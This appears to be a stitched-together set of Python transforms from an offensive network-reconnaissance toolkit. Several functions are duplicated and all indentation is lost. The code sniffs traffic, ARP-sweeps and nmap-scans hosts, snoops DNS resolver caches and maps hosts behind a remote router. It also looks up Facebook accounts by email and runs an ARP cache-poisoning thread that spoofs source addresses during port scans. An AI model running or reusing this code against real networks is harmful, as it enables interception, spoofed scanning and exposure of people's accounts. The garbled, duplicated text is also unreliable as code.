def passivescan(network, response):
nodes = {}
debug('Sniffing network traffic for more hosts.')
ans = sniff(count=config['scapy/sniffcount'],
timeout=config['scapy/snifftimeout'])
debug('Analyzing traffic.')
for i in ans:
src = None
dst = None
if IP in i:
src = i[IP].src
dst = i[IP].dst
elif ARP in i:
src = i[ARP].psrc
dst = i[ARP].pdst
else:
continue
if src in network and src not in nodes:
nodes[src] = True
e = IPv4Address(src, internal=True)
e += Field('ethernet.hwaddr',
i.src,
displayname='Hardware Address')
response += e
if dst in network and dst not in nodes and i.dst != 'ff:ff:ff:ff:ff:ff':
nodes[dst] = True
e = IPv4Address(dst, internal=True)
e += Field('ethernet.hwaddr',
i.dst,
displayname='Hardware Address')
response += e
def passivescan(network, response):
nodes = {}
debug('Sniffing network traffic for more hosts.')
ans = sniff(count=config['scapy/sniffcount'], timeout=config['scapy/snifftimeout'])
debug('Analyzing traffic.')
for i in ans:
src = None
dst = None
if IP in i:
src = i[IP].src
dst = i[IP].dst
elif ARP in i:
src = i[ARP].psrc
dst = i[ARP].pdst
else:
continue
if src in network and src not in nodes:
nodes[src] = True
e = IPv4Address(src, internal=True)
e += Field('ethernet.hwaddr', i.src, displayname='Hardware Address')
response += e
if dst in network and dst not in nodes and i.dst != 'ff:ff:ff:ff:ff:ff':
nodes[dst] = True
e = IPv4Address(dst, internal=True)
e += Field('ethernet.hwaddr', i.dst, displayname='Hardware Address')
response += e
def findlocalneighbors(network, response):
debug('ARP sweeping %s' % network.netblock)
e = Netblock(network.netblock)
e += Label('CIDR Notation', repr(network))
e += Label('Network Mask', network.netmask)
e += Label('Number of Hosts', int(~network.netmask) - 1)
response += e
ans = arping(repr(network),
timeout=config['scapy/sr_timeout'],
verbose=config['scapy/sr_verbose'])[0]
for i in ans:
e = IPv4Address(i[1].psrc)
e.internal = True
e += Field('ethernet.hwaddr',
i[1].hwsrc,
displayname='Hardware Address')
response += e
if len(ans) <= 1:
passivescan(network, response)
return response
def findlocalneighbors(network, response):
debug('ARP sweeping %s' % network.netblock)
e = Netblock(network.netblock)
e += Label('CIDR Notation', repr(network))
e += Label('Network Mask', network.netmask)
e += Label('Number of Hosts', int(~network.netmask) - 1)
response += e
ans = arping(
repr(network),
timeout=config['scapy/sr_timeout'],
verbose=config['scapy/sr_verbose']
)[0]
for i in ans:
e = IPv4Address(i[1].psrc)
e.internal = True
e += Field('ethernet.hwaddr', i[1].hwsrc, displayname='Hardware Address')
response += e
if len(ans) <= 1:
passivescan(network, response)
return response
def dotransform(request, response):
target = request.value
s = NmapScanner()
debug('Starting scan on host: %s' % target)
r = s.scan(['-n', '-A', target] + list(request.params), NmapReportParser)
addports(r, response)
addsystems(r, response)
addreport(r, response, '-A')
return response
def dotransform(request, response):
for r in config['dnscachelookup/resolvers']:
debug('fetching from %s' % r)
ans = nslookup(request.value, 255, r, rd=0)
if ans is None:
continue
elif isinstance(ans, list):
for a in ans:
addrecord(a.an, response)
elif ans[DNS].ancount:
for i in range(0, ans[DNS].ancount):
addrecord(ans[DNS].an[i], response)
return response
def getuser(browser, uid, email):
if uid:
data = {"viewer": uid, "value": email, "__a": 1}
r = browser.open("http://www.facebook.com/ajax/typeahead/search.php?%s" % urlencode(data))
if r.code == 200:
s = r.read()
json = loads(s[s.find("{") :])
if "error" in json:
raise Exception("%s: %s" % (json["errorSummary"], json["errorDescription"]))
if json["payload"]["entries"]:
debug(json["payload"]["entries"][0])
return json["payload"]["entries"][0]
return None
def getuser(browser, uid, email):
if uid:
data = {'viewer': uid, 'value': email, '__a': 1}
r = browser.open(
"http://www.facebook.com/ajax/typeahead/search.php?%s" %
urlencode(data))
if r.code == 200:
s = r.read()
json = loads(s[s.find('{'):])
if 'error' in json:
raise Exception(
"%s: %s" %
(json['errorSummary'], json['errorDescription']))
if json['payload']['entries']:
debug(json['payload']['entries'][0])
return json['payload']['entries'][0]
return None
def dotransform(request, response):
ip = request.value
ans = nslookup("www.google.ca", nameserver=ip)
if ans is not None:
for site in topsites:
debug('Resolving %s' % site)
ans = nslookup(site, nameserver=ip, rd=0)
if ans[DNS].ancount:
e = DNSName(site)
t = Table(['Name', 'Query Class', 'Query Type', 'Data', 'TTL'], 'Cached Answers')
for i in range(0, ans[DNS].ancount):
rr = ans[DNS].an[i]
t.addrow([
rr.rrname.rstrip('.'),
rr.sprintf('%rclass%'),
rr.sprintf('%type%'),
rr.rdata.rstrip('.'),
rr.sprintf('%ttl%')
])
e += Label('Cached Answers', t, type='text/html')
response += e
else:
response += UIMessage('DNS server did not respond to initial DNS request.')
return response
def run(self):
debug('ARP cache poisoning thread waiting for victims...')
ip = q.get()
debug('Acquired first victim... %s' % ip)
pe = Ether(src=self.mac, dst=self.rmac)
pa = ARP(op='is-at', hwsrc=self.mac, psrc=ip, hwdst=self.rmac)
while True:
try:
ip = q.get_nowait()
if ip is None:
break
else:
debug('Changing victim to %s...' % ip)
pa.psrc = ip
except Empty:
# Send the poison... all your base are belong to us!
sendp(pe/pa, verbose=0)
sleep(1/self.poison_rate)
def findremoteneighbors(ip, response):
debug('Doing an ARIN whois lookup...')
w = objectify(whoisip(ip, accept='application/xml'))
network = IPNetwork([w.startAddress, w.endAddress])
e = Netblock(network.netblock)
e += Label('CIDR Notation', repr(network))
e += Label('Network Mask', network.netmask)
e += Label('Number of Hosts', int(~network.netmask) - 1)
response += e
if network.cidrlen < 24:
debug(
'According to ARIN, the CIDR length is %d, reducing it to 24 for the scan...'
% network.cidrlen)
network.netblock = '%s/24' % ip
debug('Probing the host on TCP ports 0-1024...')
r = sr1(IP(dst=str(ip)) / TCP(dport=(0, 1024)),
timeout=config['scapy/sr_timeout'],
verbose=config['scapy/sr_verbose'],
retry=config['scapy/sr_retries'])
if r is not None and r.src == ip:
dport = r.sport
debug('Performing a traceroute to destination %s' % ip)
ans = traceroute2(str(ip),
TCP(dport=dport),
timeout=config['scapy/sr_timeout'],
verbose=config['scapy/sr_verbose'],
retry=config['scapy/sr_retries'])
l_hop = ans[-1]
sl_hop = ans[-2]
if sl_hop['ttl'] != l_hop['ttl'] - 1:
debug(
"It takes %d hops to get to %s but we could only find the router at hop %d (%s)."
% (l_hop['ttl'], ip, sl_hop['ttl'], sl_hop['ip']))
debug("Can't find second last hop... aborting...")
else:
debug(
'It takes %d hops to get to %s and it is attached to router %s...'
% (l_hop['ttl'], ip, sl_hop['ip']))
debug('Sending probe packets to %s with ttl %d...' %
(network, sl_hop['ttl']))
ans = sr(IP(dst=repr(network), ttl=sl_hop['ttl']) /
TCP(dport=dport),
timeout=config['scapy/sr_timeout'],
verbose=config['scapy/sr_verbose'],
retry=config['scapy/sr_retries'])[0]
for r in ans:
if r[1].src == sl_hop['ip']:
debug('%s is attached to the same router...' % r[0].dst)
e = IPv4Address(r[0].dst)
alive = sr1(IP(dst=r[0].dst) / TCP(dport=dport),
timeout=config['scapy/sr_timeout'],
verbose=config['scapy/sr_verbose'],
retry=config['scapy/sr_retries'])
if alive is not None:
e += Field('alive', 'true')
response += e
return response
def findremoteneighbors(ip, response):
debug('Doing an ARIN whois lookup...')
w = objectify(whoisip(ip, accept='application/xml'))
network = IPNetwork([w.startAddress, w.endAddress])
e = Netblock(network.netblock)
e += Label('CIDR Notation', repr(network))
e += Label('Network Mask', network.netmask)
e += Label('Number of Hosts', int(~network.netmask) - 1)
response += e
if network.cidrlen < 24:
debug('According to ARIN, the CIDR length is %d, reducing it to 24 for the scan...' % network.cidrlen)
network.netblock = '%s/24' % ip
debug('Probing the host on TCP ports 0-1024...')
r = sr1(
IP(dst=str(ip))/TCP(dport=(0,1024)),
timeout=config['scapy/sr_timeout'],
verbose=config['scapy/sr_verbose'],
retry=config['scapy/sr_retries']
)
if r is not None and r.src == ip:
dport = r.sport
debug('Performing a traceroute to destination %s' % ip)
ans = traceroute2(
str(ip),
TCP(dport=dport),
timeout=config['scapy/sr_timeout'],
verbose=config['scapy/sr_verbose'],
retry=config['scapy/sr_retries']
)
l_hop = ans[-1]
sl_hop = ans[-2]
if sl_hop['ttl'] != l_hop['ttl'] - 1:
debug(
"It takes %d hops to get to %s but we could only find the router at hop %d (%s)." %
(l_hop['ttl'], ip, sl_hop['ttl'], sl_hop['ip'])
)
debug("Can't find second last hop... aborting...")
else:
debug('It takes %d hops to get to %s and it is attached to router %s...' % (l_hop['ttl'], ip, sl_hop['ip']))
debug('Sending probe packets to %s with ttl %d...' % (network, sl_hop['ttl']))
ans = sr(
IP(dst=repr(network), ttl=sl_hop['ttl'])/TCP(dport=dport),
timeout=config['scapy/sr_timeout'],
verbose=config['scapy/sr_verbose'],
retry=config['scapy/sr_retries']
)[0]
for r in ans:
if r[1].src == sl_hop['ip']:
debug('%s is attached to the same router...' % r[0].dst)
e = IPv4Address(r[0].dst)
alive = sr1(
IP(dst=r[0].dst)/TCP(dport=dport),
timeout=config['scapy/sr_timeout'],
verbose=config['scapy/sr_verbose'],
retry=config['scapy/sr_retries']
)
if alive is not None:
e += Field('alive', 'true')
response += e
return response
def dotransform(request, response):
params = parse_args(request.params)
ports = portrange(params.target_ports) if params.target_ports is not None else config['irsscan/target_ports']
dst = params.target_host if params.target_host is not None else config['irsscan/target_host']
global q
q = Queue()
debug('Sending probes to %s' % dst)
# This is the template used to send traffic
p = Ether()/IP(dst=dst, id=int(RandShort()))/TCP(dport=ports, sport=int(RandShort()), seq=int(RandInt()))
# We need to fix these values so that Scapy doesn't poop all over them
p.dst = router_mac = p.dst
p.src = my_mac = p.src
# Begin the evil... mwuahahahahaha..
apw = ArpCachePoisoner(my_mac, router_mac)
apw.start()
# Loop through our IP address block and send out the probes
for i in iprange(request.value):
# Queue and set the current IP we are poisoning for the poisoner.
q.put(str(i))
p[IP].src = str(i)
sleep(0.5)
# Send the probes!
ans, unans = srp(
p,
retry=config['irsscan/sr_retries'],
timeout=config['irsscan/sr_timeout'],
verbose=config['irsscan/sr_verbose']
)
if ans:
for a in ans:
req, res = a
e = Port(req.dport)
e.source = req[IP].src
e.destination = req[IP].dst
e += Label('Summary', res.summary())
if TCP in res:
e.response = res[TCP].sprintf('TCP:%flags%')
e.status = PortStatus.Closed if (res[TCP].flags & 4) else PortStatus.Open
elif ICMP in res:
e.response = res[ICMP].sprintf('ICMP:%type%')
e.status = PortStatus.TimedOut
response += e
if unans:
for u in unans:
e = Port(u.dport)
e.source = u[IP].src
e.destination = u[IP].dst
e.status = PortStatus.TimedOut
e.response = 'none'
response += e
# Goodbye!
q.put(None)
apw.join()
return response
def onterminate(*args):
debug('Terminated.')
exit(0)
def onterminate():
debug('Caught signal... exiting.')
exit(0)
def dotransform(request, response):
progress(50)
debug('This was pointless!')
progress(100)
return response + Phrase('Hello %s' % request.value)